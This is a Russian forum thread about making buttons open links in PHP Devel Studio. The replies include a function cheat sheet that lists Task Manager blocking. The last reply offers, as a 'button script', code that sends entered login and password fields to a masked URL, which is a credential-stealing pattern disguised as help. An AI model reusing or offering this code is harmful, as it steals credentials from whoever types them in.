1. Привет Гость, в нашем магазине проходит акция! Смотри эту тему.
    Так же цена на VIP снижена!

Скажите PHP код для ссылки на кнопку

Тема в разделе "Программирование", создана пользователем Sasha55, 28 авг 2012.

Статус темы:
Закрыта.
  1. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    Вот я хочу сделать сборник(ну сборник типо такого http://4put.ru/pictures/max/393/1208199.jpg),в PHP Devel Studio делаю картинку,кнопки,так вот скажите PHP код чтоб на кнопки ссылки сделать,ото весь инет обыскал найти немогу(((
     
  2.  
  3. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    модератор одобри плиз))
     
  4. Оффлайн

    {е2_Знакомы} 21.11.2013гг

    На форуме с:
    5 июн 2012
    Сообщения:
    188
    Симпатии:
    425
    Баллы:
    45
    Пол:
    Мужской
    skype:
    bloouker71
    держии)) с тебя спс)) Run("тут ссыль",)
     
    Sasha55 нравится это.
  5. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    спс,лови спасибку))
     
  6. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    не получилосьcrayвидео можеш сделать плизbn
     
  7. Оффлайн

    {е2_Знакомы} 21.11.2013гг

    На форуме с:
    5 июн 2012
    Сообщения:
    188
    Симпатии:
    425
    Баллы:
    45
    Пол:
    Мужской
    skype:
    bloouker71
    Глянь может тут найдеш
    1. Приложение
    LoadForm(, LD_NONE); ----> Загрузить форму.
    ShowForm(, SW_SHOW); ------> Показать форму.
    HideForm(, SW_SHOW); ------> Скрыть форму.
    messageDlg("", mtWarning, MB_OK); --------- Сообщение диалог.
    MessageBox("", ""); ------> Показать сообщение.
    app::close(); ------> Закрыть приложение.
    app::hide(); -------> Минимизировать приложение.
    app::restore(); ------> Восстановление приложение.
    app::title(""); -------> Задать заголовок приложения.

    2. Скрипты
    include ""; ------> Подключение файла в код сценария PHP.
    require ""; ------> Подключить php скрипт.
    if () --------------> Если тогда ...
    else --------------> Иначе ...
    { ------------------> Начало.
    } ------------------> Конец.
    unset($x); -------> Уничтожить переменную.
    $x = ; -----------> Задать Значение переменной.
    // ---------------> Комментарий.

    3. Система
    Run("", false); --------> Открыть или Запустить.
    RunWith("", ""); ------> Открыть с помощью программы.
    DisableTaskMng(false); --------> Блокировать Диспетчер задач Windows.
    WinShutdown(); ------> Выключение Системы или Компьютера.
    WinRestart(); ---------> Перезагрузка Компьютера.
    WinLogoff(); ----------> Выход из системы.
    WinSleep(); ------------> Спящий режим.
    SetupInf(""); -----------> Установить драйвера.
    $x = winLocalPath( CSIDL_DESKTOP ); -----------> Узнать локальную win директорию.

    4. Ini файлы
    ini::eek:pen(""); --------> Открытие Ini файлов.
    ini::read("", "", $x); --------> Прочитать значение из Ini.
    ini::write("", "", ""); ---------> Запись в значение Ini.
    ini::deleteSection(""); ---------> Удаление Ini секции.
    ini::deleteKey("", ""); ----------> Удаление Ini ключ.
    ini::readSections($x); ----------> Прочитать секции из Ini.
    ini::readKeys("", $x); -----------> Чтение ключей из Ini файлов.

    5. Реестр
    readRegKey(HKEY_CLASSES_ROOT, "", , STRING); -----------> Чтение реестра.
    writeRegKey(HKEY_CLASSES_ROOT, "", "", STRING); -----------> Запись реестра.
     
  8. Оффлайн

    {е2_Знакомы} 21.11.2013гг

    На форуме с:
    5 июн 2012
    Сообщения:
    188
    Симпатии:
    425
    Баллы:
    45
    Пол:
    Мужской
    skype:
    bloouker71
    run("ссылка");
     
  9. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    а какое оригинальное название кнопки в Devel Studio,button1 ?
    (Даа)
     
  10. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    у тебя какая версия Devel Studio? 3.0?
     
  11. Оффлайн

    Dsadas

    На форуме с:
    1 ноя 2012
    Сообщения:
    16
    Симпатии:
    7
    Баллы:
    3
    Пол:
    Мужской
    $edit1 = c('Form1->edit1')->text;
    messageDlg("??????", mtWarning, MB_OK);
    $edit2 = c('Form1->edit2')->text;
    $combobox1 = c('Form1->combobox1')->inText;
    $url = "???????";
    file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);Саня вот скрипт на кнопку:
     
Статус темы:
Закрыта.

Поделиться этой страницей

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!